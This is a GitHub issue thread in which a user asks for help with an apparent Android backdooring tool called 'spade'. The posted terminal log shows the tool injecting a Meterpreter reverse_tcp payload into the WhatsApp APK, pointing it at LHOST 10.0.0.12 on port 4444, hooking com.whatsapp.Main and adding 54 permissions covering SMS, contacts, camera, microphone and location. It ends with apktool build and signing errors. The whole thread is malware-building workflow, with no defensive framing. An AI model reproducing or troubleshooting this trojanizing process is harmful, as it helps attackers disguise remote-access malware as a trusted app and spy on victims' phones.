### ISSUE TITLE
error while signing 

### ISSUE THREAD

**Issue by qballza** [suraj-root/spade#14]
i have the following error while it tries to sign. 

please if someone can help?

root@kali:/spade# sudo ./spade.py ../root/whatsapp.apk 
 _______  _______  _______  ______   _______ 
|       ||       ||   _   ||      | |       |
|  _____||    _  ||  |_|  ||  _    ||    ___|
| |_____ |   |_| ||       || | |   ||   |___ 
|_____  ||    ___||       || |_|   ||    ___|
 _____| ||   |    |   _   ||       ||   |___ 
|_______||___|    |__| |__||______| |_______| 

                               created by Suraj(#r00t)				

[*] Started spade at 14:57:30
[*] Check file ../root/whatsapp.apk
[+] File ../root/whatsapp.apk OK
PAYLOADS
[1] android/meterpreter/reverse_http
[2] android/meterpreter/reverse_https
[3] android/meterpreter/reverse_tcp
[4] android/shell/reverse_http
[5] android/shell/reverse_https
[6] android/shell/reverse_tcp
Payload> 3
LHOST> 10.0.0.12
LPORT> 4444
[*] Generating payload...
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8772 bytes
Saved as: temp.apk
[+] Payload created as temp.apk
[*] Decompiling apks...
I: Using Apktool 2.2.0 on whatsapp.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
I: Using Apktool 2.2.0 on temp.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
[*] Injecting payload...
[*] Injecting hooks in com.whatsapp.Main...
[+] Hook injected -> metasploit/stage/Payload
[*] Adding permissions...
	android.permission.NFC
	android.permission.VIBRATE
	com.huawei.android.launcher.permission.WRITE_SETTINGS
	android.permission.WRITE_EXTERNAL_STORAGE
	com.sec.android.provider.badge.permission.READ
	com.sonyericsson.home.permission.BROADCAST_BADGE
	android.permission.READ_PROFILE
	android.permission.GET_TASKS
	com.android.launcher.permission.UNINSTALL_SHORTCUT
	android.permission.ACCESS_NETWORK_STATE
	com.whatsapp.permission.C2D_MESSAGE
	android.permission.USE_CREDENTIALS
	android.permission.MODIFY_AUDIO_SETTINGS
	android.permission.MANAGE_ACCOUNTS
	android.permission.READ_SYNC_STATS
	com.huawei.android.launcher.permission.CHANGE_BADGE
	android.permission.CHANGE_WIFI_STATE
	android.permission.BROADCAST_STICKY
	android.permission.READ_PHONE_STATE
	com.whatsapp.permission.VOIP_CALL
	android.permission.INSTALL_SHORTCUT
	android.permission.GET_ACCOUNTS
	android.permission.RECORD_AUDIO
	com.htc.launcher.permission.UPDATE_SHORTCUT
	com.htc.launcher.permission.READ_SETTINGS
	com.google.android.providers.gsf.permission.READ_GSERVICES
	android.permission.READ_SYNC_SETTINGS
	android.permission.CAMERA
	android.permission.ACCESS_FINE_LOCATION
	android.permission.ACCESS_WIFI_STATE
	android.permission.ACCESS_COARSE_LOCATION
	android.permission.INTERNET
	com.whatsapp.permission.MAPS_RECEIVE
	android.permission.SEND_SMS
	android.permission.RECEIVE_SMS
	android.permission.WRITE_CALL_LOG
	com.android.launcher.permission.INSTALL_SHORTCUT
	android.permission.WAKE_LOCK
	android.permission.AUTHENTICATE_ACCOUNTS
	android.permission.READ_CONTACTS
	com.google.android.c2dm.permission.RECEIVE
	android.permission.BLUETOOTH
	android.permission.WRITE_CONTACTS
	android.permission.WRITE_SETTINGS
	android.permission.WRITE_SYNC_SETTINGS
	android.permission.CALL_PHONE
	com.sec.android.provider.badge.permission.WRITE
	android.permission.READ_CALL_LOG
	com.sonymobile.home.permission.PROVIDER_INSERT_BADGE
	android.permission.RECEIVE_BOOT_COMPLETED
	android.permission.SET_WALLPAPER
	com.huawei.android.launcher.permission.READ_SETTINGS
	android.permission.READ_SMS
	com.whatsapp.permission.BROADCAST
[+] 54 Permissions added.
[*] Recompiling...
I: Using Apktool 2.2.0
I: Smaling smali folder into classes.dex...
I: Building resources...
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_4975888409349012448.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 25, --version-code, 451863, --version-name, 2.17.223, -F, /tmp/APKTOOL1020234692322245770.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /spade/whatsapp/res, -M, /spade/whatsapp/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:473)
	at brut.androlib.Androlib.buildResources(Androlib.java:407)
	at brut.androlib.Androlib.build(Androlib.java:306)
	at brut.androlib.Androlib.build(Androlib.java:263)
	at brut.apktool.Main.cmdBuild(Main.java:224)
	at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_4975888409349012448.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 25, --version-code, 451863, --version-name, 2.17.223, -F, /tmp/APKTOOL1020234692322245770.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /spade/whatsapp/res, -M, /spade/whatsapp/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:439)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:459)
	... 5 more
Caused by: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_4975888409349012448.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 25, --version-code, 451863, --version-name, 2.17.223, -F, /tmp/APKTOOL1020234692322245770.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /spade/whatsapp/res, -M, /spade/whatsapp/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:97)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:433)
	... 6 more
Caused by: java.io.IOException: Cannot run program "/tmp/brut_util_Jar_4975888409349012448.tmp": error=2, No such file or directory
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1048)
	at brut.util.OS.exec(OS.java:90)
	... 7 more
Caused by: java.io.IOException: error=2, No such file or directory
	at java.lang.UNIXProcess.forkAndExec(Native Method)
	at java.lang.UNIXProcess.<init>(UNIXProcess.java:247)
	at java.lang.ProcessImpl.start(ProcessImpl.java:134)
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)
	... 8 more
[*] Signing apk...
java.io.FileNotFoundException: whatsapp/dist/whatsapp.apk (No such file or directory)
	at java.util.zip.ZipFile.open(Native Method)
	at java.util.zip.ZipFile.<init>(ZipFile.java:219)
	at java.util.zip.ZipFile.<init>(ZipFile.java:149)
	at java.util.jar.JarFile.<init>(JarFile.java:166)
	at java.util.jar.JarFile.<init>(JarFile.java:145)
	at orig.SignApk.main(SignApk.java:488)
[+] Successfully backdoored and saved as whatsapp-final.apk
Do you want to setup a listener?[y/n]

**Comment by qballza** [comment]
apktool if fr
Exception in thread "main" brut.androlib.AndrolibException: java.io.FileNotFoundException: fr (No such file or directory)
	at brut.androlib.res.AndrolibResources.installFramework(AndrolibResources.java:676)
	at brut.androlib.res.AndrolibResources.installFramework(AndrolibResources.java:621)
	at brut.androlib.Androlib.installFramework(Androlib.java:684)
	at brut.apktool.Main.cmdInstallFramework(Main.java:241)
	at brut.apktool.Main.main(Main.java:87)
Caused by: java.io.FileNotFoundException: fr (No such file or directory)
	at java.util.zip.ZipFile.open(Native Method)
	at java.util.zip.ZipFile.<init>(ZipFile.java:219)
	at java.util.zip.ZipFile.<init>(ZipFile.java:149)
	at java.util.zip.ZipFile.<init>(ZipFile.java:163)
	at brut.androlib.res.AndrolibResources.installFramework(AndrolibResources.java:629)
